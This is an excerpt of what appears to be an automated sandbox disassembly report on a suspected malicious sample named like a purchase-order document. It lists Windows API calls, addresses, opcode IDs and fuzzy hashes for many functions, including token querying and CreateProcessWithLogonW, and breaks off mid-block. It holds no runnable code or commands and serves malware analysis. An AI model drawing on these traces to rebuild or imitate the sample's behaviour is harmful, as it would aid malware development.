                                                                                    • Opcode Fuzzy Hash: bd35ec564f5cc6e1c6264c08d68fbd443a87ed62867b5cc1b8a8f7d19da5f130
                                                                                    • Instruction Fuzzy Hash: 5A817A70208241AFD714DF64C8C6E2ABBE5FF94308F14895DF45A8B2A2DB31ED45CB92
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(00000035), ref: 0019F7B9
                                                                                    • SysAllocString.OLEAUT32(00000001), ref: 0019F860
                                                                                    • VariantCopy.OLEAUT32(0019FA64,00000000), ref: 0019F889
                                                                                    • VariantClear.OLEAUT32(0019FA64), ref: 0019F8AD
                                                                                    • VariantCopy.OLEAUT32(0019FA64,00000000), ref: 0019F8B1
                                                                                    • VariantClear.OLEAUT32(?), ref: 0019F8BB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearCopy$AllocInitString
                                                                                    • String ID:
                                                                                    • API String ID: 3859894641-0
                                                                                    • Opcode ID: a12dc16a71eb9a3bba02e91fb4a06d6fd333116227c64057b01406353425c7d2
                                                                                    • Instruction ID: fc2bc2319b07ae42df77af298a8b56f799503245bc1e1e084147d170d9d3f302
                                                                                    • Opcode Fuzzy Hash: a12dc16a71eb9a3bba02e91fb4a06d6fd333116227c64057b01406353425c7d2
                                                                                    • Instruction Fuzzy Hash: 7F51C131600310FACF24AF65D895B69B3A8EF55324B24846FF806DF292DB70CC46CB96
                                                                                    APIs
                                                                                      • Part of subcall function 00147620: _wcslen.LIBCMT ref: 00147625
                                                                                      • Part of subcall function 00146B57: _wcslen.LIBCMT ref: 00146B6A
                                                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 001B94E5
                                                                                    • _wcslen.LIBCMT ref: 001B9506
                                                                                    • _wcslen.LIBCMT ref: 001B952D
                                                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 001B9585
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$FileName$OpenSave
                                                                                    • String ID: X
                                                                                    • API String ID: 83654149-3081909835
                                                                                    • Opcode ID: 0ef6ac6a759d8bfe4c062760315d801c3526ab95543421da48a3f7ee0d61c3b1
                                                                                    • Instruction ID: 1c728d131f191dae5faaf4d4a6b96bd8241c7f3d097ef284cb9c6d713fe3ffd5
                                                                                    • Opcode Fuzzy Hash: 0ef6ac6a759d8bfe4c062760315d801c3526ab95543421da48a3f7ee0d61c3b1
                                                                                    • Instruction Fuzzy Hash: 0CE1AF31908341CFD724DF24C885AAEB7E0BF95314F14896DF9999B2A2DB31DD06CB92
                                                                                    APIs
                                                                                      • Part of subcall function 00159BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00159BB2
                                                                                    • BeginPaint.USER32(?,?,?), ref: 00159241
                                                                                    • GetWindowRect.USER32(?,?), ref: 001592A5
                                                                                    • ScreenToClient.USER32(?,?), ref: 001592C2
                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 001592D3
                                                                                    • EndPaint.USER32(?,?,?,?,?), ref: 00159321
                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 001971EA
                                                                                      • Part of subcall function 00159339: BeginPath.GDI32(00000000), ref: 00159357
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                    • String ID:
                                                                                    • API String ID: 3050599898-0
                                                                                    • Opcode ID: 56f2443b5a2b27e95e3c2da249fb227a5a79e7e23c7562529c89cd88912b83ec
                                                                                    • Instruction ID: 20186f4a64eb0482e4bc77d3d05a0de85db34e288e6a233ab7d8021b93973278
                                                                                    • Opcode Fuzzy Hash: 56f2443b5a2b27e95e3c2da249fb227a5a79e7e23c7562529c89cd88912b83ec
                                                                                    • Instruction Fuzzy Hash: 9E419F70105201EFDB11DF24DC88FBA7BB8EF65321F144669FA648B2E1C7319849DBA2
                                                                                    APIs
                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 001B080C
                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 001B0847
                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 001B0863
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 001B08DC
                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 001B08F3
                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 001B0921
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                    • String ID:
                                                                                    • API String ID: 3368777196-0
                                                                                    • Opcode ID: 3e671eadc394e576c343714f6dd93b493699aa9fdc4d15b32b9af62612f6e001
                                                                                    • Instruction ID: 0dafaaaf3d78f8e631364f494d3261d669c39281e351c62efe325d4a91f05a46
                                                                                    • Opcode Fuzzy Hash: 3e671eadc394e576c343714f6dd93b493699aa9fdc4d15b32b9af62612f6e001
                                                                                    • Instruction Fuzzy Hash: 16416771900205EFDF15AF54DC85AAAB7B8FF08300F1480A9ED04AE297DB30DE65DBA0
                                                                                    APIs
                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0019F3AB,00000000,?,?,00000000,?,0019682C,00000004,00000000,00000000), ref: 001D824C
                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 001D8272
                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000), ref: 001D82D1
                                                                                    • ShowWindow.USER32(00000000,00000004), ref: 001D82E5
                                                                                    • EnableWindow.USER32(00000000,00000001), ref: 001D830B
                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 001D832F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 642888154-0
                                                                                    • Opcode ID: b5d5814477cc91836cf6bd555fb2ea17b3e43efa04b5fd323e89504cc0577032
                                                                                    • Instruction ID: 70b361ca79fb63bbb01dab63a1110f1b3388b43ece1a51c622d64a72028923c3
                                                                                    • Opcode Fuzzy Hash: b5d5814477cc91836cf6bd555fb2ea17b3e43efa04b5fd323e89504cc0577032
                                                                                    • Instruction Fuzzy Hash: 54418034602644AFDF25CF25DC99BE47BF1FB1A715F1842AAE6184B3A2CB31A851CB50
                                                                                    APIs
                                                                                    • IsWindowVisible.USER32(?), ref: 001A4C95
                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 001A4CB2
                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 001A4CEA
                                                                                    • _wcslen.LIBCMT ref: 001A4D08
                                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 001A4D10
                                                                                    • _wcsstr.LIBVCRUNTIME ref: 001A4D1A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                    • String ID:
                                                                                    • API String ID: 72514467-0
                                                                                    • Opcode ID: 4cc32e508c15eca87773caf0966847ed83ff11fb708232236ae7f0329dc52982
                                                                                    • Instruction ID: 63bff3771583b6d758212c144afb416b464ce92d7a9fcd5a9c407969bb28dd19
                                                                                    • Opcode Fuzzy Hash: 4cc32e508c15eca87773caf0966847ed83ff11fb708232236ae7f0329dc52982
                                                                                    • Instruction Fuzzy Hash: EB213B35605201BBEB155B79DC0AEBB7B9CDF96760F10403EF809CA192DFA1DC41C2A0
                                                                                    APIs
                                                                                      • Part of subcall function 00143AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00143A97,?,?,00142E7F,?,?,?,00000000), ref: 00143AC2
                                                                                    • _wcslen.LIBCMT ref: 001B587B
                                                                                    • CoInitialize.OLE32(00000000), ref: 001B5995
                                                                                    • CoCreateInstance.OLE32(001DFCF8,00000000,00000001,001DFB68,?), ref: 001B59AE
                                                                                    • CoUninitialize.OLE32 ref: 001B59CC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                    • String ID: .lnk
                                                                                    • API String ID: 3172280962-24824748
                                                                                    • Opcode ID: d2dd43933b6d7f7e268e185c60886679b523e3fa58f205b5355984636c26b5f6
                                                                                    • Instruction ID: 465dcef2bec761cc446729eb2e2aaa5828e7ffa1e4fcec2ecfde571fef14fffb
                                                                                    • Opcode Fuzzy Hash: d2dd43933b6d7f7e268e185c60886679b523e3fa58f205b5355984636c26b5f6
                                                                                    • Instruction Fuzzy Hash: 4DD15371A087019FC714DF25C480A6ABBE2FF99714F14885DF88A9B3A1DB31ED45CB92
                                                                                    APIs
                                                                                      • Part of subcall function 001A0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 001A0FCA
                                                                                      • Part of subcall function 001A0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 001A0FD6
                                                                                      • Part of subcall function 001A0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 001A0FE5
                                                                                      • Part of subcall function 001A0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 001A0FEC
                                                                                      • Part of subcall function 001A0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 001A1002
                                                                                    • GetLengthSid.ADVAPI32(?,00000000,001A1335), ref: 001A17AE
                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 001A17BA
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 001A17C1
                                                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 001A17DA
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,001A1335), ref: 001A17EE
                                                                                    • HeapFree.KERNEL32(00000000), ref: 001A17F5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                    • String ID:
                                                                                    • API String ID: 3008561057-0
                                                                                    • Opcode ID: 9fc60a273891cbe8f08ba23600f910ed88e668aa4fb8ec21fff32d14ee57d3bf
                                                                                    • Instruction ID: 9233824b97e43039dd6206560ed50c20bf298fa234a953557d8246b5bb7bb808
                                                                                    • Opcode Fuzzy Hash: 9fc60a273891cbe8f08ba23600f910ed88e668aa4fb8ec21fff32d14ee57d3bf
                                                                                    • Instruction Fuzzy Hash: 0911BB7A602216FFDF109FE4CC49FAE7BA9EB46355F104419F481A7290C736A980CBA0
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 001A14FF
                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 001A1506
                                                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 001A1515
                                                                                    • CloseHandle.KERNEL32(00000004), ref: 001A1520
                                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 001A154F
                                                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 001A1563
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                    • String ID:
                                                                                    • API String ID: 1413079979-0
                                                                                    • Opcode ID: d8770f432cfb10d96dd1f8736415a29e02b905b25c58b5ba2b393aeba456dff3
                                                                                    • Instruction ID: 751cece25b181282f6cc7389158ff1a0d4f230db5077c05fa69436e24f8fad9a
                                                                                    • Opcode Fuzzy Hash: d8770f432cfb10d96dd1f8736415a29e02b905b25c58b5ba2b393aeba456dff3
                                                                                    • Instruction Fuzzy Hash: A311297650620ABBDF118FA8DD49BDE7BA9EF4A744F044515FA05A20A0C375CEA0DBA0
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,00163379,00162FE5), ref: 00163390
                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0016339E
                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001633B7
                                                                                    • SetLastError.KERNEL32(00000000,?,00163379,00162FE5), ref: 00163409
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                    • String ID:
                                                                                    • API String ID: 3852720340-0
                                                                                    • Opcode ID: d584c2a2279176255687dcd74fd35c26c021689f67affab46e3fc37261be1425
                                                                                    • Instruction ID: 14213ea198344c4c2d10f5439ea8380d50ec1da46598180dd96340ed6a840bcf
                                                                                    • Opcode Fuzzy Hash: d584c2a2279176255687dcd74fd35c26c021689f67affab46e3fc37261be1425
                                                                                    • Instruction Fuzzy Hash: 0901D432609311BEEA292775BC895776A95FB25379730032AF530812F1EF114E31D594
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,00175686,00183CD6,?,00000000,?,00175B6A,?,?,?,?,?,0016E6D1,?,00208A48), ref: 00172D78
                                                                                    • _free.LIBCMT ref: 00172DAB
                                                                                    • _free.LIBCMT ref: 00172DD3
                                                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,0016E6D1,?,00208A48,00000010,00144F4A,?,?,00000000,00183CD6), ref: 00172DE0
                                                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,0016E6D1,?,00208A48,00000010,00144F4A,?,?,00000000,00183CD6), ref: 00172DEC
                                                                                    • _abort.LIBCMT ref: 00172DF2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                    • String ID:
                                                                                    • API String ID: 3160817290-0
                                                                                    • Opcode ID: bb9f149a9a5b3820d6c0cbabfdab3c3d9fa29c76c9b97387269fec732e3031f2
                                                                                    • Instruction ID: ca17791e81ac7f7d876e6cb6d0ed3a49a9a2120bda4251c7a95b7cfd6ed5e23b
                                                                                    • Opcode Fuzzy Hash: bb9f149a9a5b3820d6c0cbabfdab3c3d9fa29c76c9b97387269fec732e3031f2
                                                                                    • Instruction Fuzzy Hash: 99F0283190660137C63223B8FC0AE5A2679BFD67A0F25C519F82C932D2EF3088835160
                                                                                    APIs
                                                                                      • Part of subcall function 00159639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00159693
                                                                                      • Part of subcall function 00159639: SelectObject.GDI32(?,00000000), ref: 001596A2
                                                                                      • Part of subcall function 00159639: BeginPath.GDI32(?), ref: 001596B9
                                                                                      • Part of subcall function 00159639: SelectObject.GDI32(?,00000000), ref: 001596E2
                                                                                    • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 001D8A4E
                                                                                    • LineTo.GDI32(?,00000003,00000000), ref: 001D8A62
                                                                                    • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 001D8A70
                                                                                    • LineTo.GDI32(?,00000000,00000003), ref: 001D8A80
                                                                                    • EndPath.GDI32(?), ref: 001D8A90
                                                                                    • StrokePath.GDI32(?), ref: 001D8AA0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                    • String ID:
                                                                                    • API String ID: 43455801-0
                                                                                    • Opcode ID: 787e76599ef28169db259e38e70c7aa8e66302af84bb37a0f8376e7d78949290
                                                                                    • Instruction ID: f2454bce6cc8d2b1fc4e116792ca53115b62eb05fd2c690babb87fb12f3a3368
                                                                                    • Opcode Fuzzy Hash: 787e76599ef28169db259e38e70c7aa8e66302af84bb37a0f8376e7d78949290
                                                                                    • Instruction Fuzzy Hash: 8911177600114DFFEF129F90EC88EEA7F6CEB08350F008422BA199A1A1C7719D95DFA0
                                                                                    APIs
                                                                                    • GetDC.USER32(00000000), ref: 001A5218
                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 001A5229
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001A5230
                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 001A5238
                                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 001A524F
                                                                                    • MulDiv.KERNEL32(000009EC,00000001,?), ref: 001A5261
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CapsDevice$Release
                                                                                    • String ID:
                                                                                    • API String ID: 1035833867-0
                                                                                    • Opcode ID: 23f0b48c61f35c91e09b09e30ed5611a233648a20efd3fd474a263bffc3adbc1
                                                                                    • Instruction ID: f5fa2e34d23a33b80722e441425945392f7a5c14b67d42afff1e193793b6f10d
                                                                                    • Opcode Fuzzy Hash: 23f0b48c61f35c91e09b09e30ed5611a233648a20efd3fd474a263bffc3adbc1
                                                                                    • Instruction Fuzzy Hash: CF018F75A02719BBEB109BA59C49B4EBFB8EF48751F044466FA04A7680D6709800CBA0
                                                                                    APIs
                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00141BF4
                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00141BFC
                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00141C07
                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00141C12
                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00141C1A
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00141C22
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual
                                                                                    • String ID:
                                                                                    • API String ID: 4278518827-0
                                                                                    • Opcode ID: 3df470a4c8971bf68d764f61c102369d32f54d12e3a180597862afff246dffa6
                                                                                    • Instruction ID: 04f18855b94cbeee8cff9c74a0303c482cb0212186a562249e4aa1444964351e
                                                                                    • Opcode Fuzzy Hash: 3df470a4c8971bf68d764f61c102369d32f54d12e3a180597862afff246dffa6
                                                                                    • Instruction Fuzzy Hash: FB016CB090275A7DE3008F5A8C85B52FFA8FF19354F00411B915C47A41C7F5A864CBE5
                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 001AEB30
                                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 001AEB46
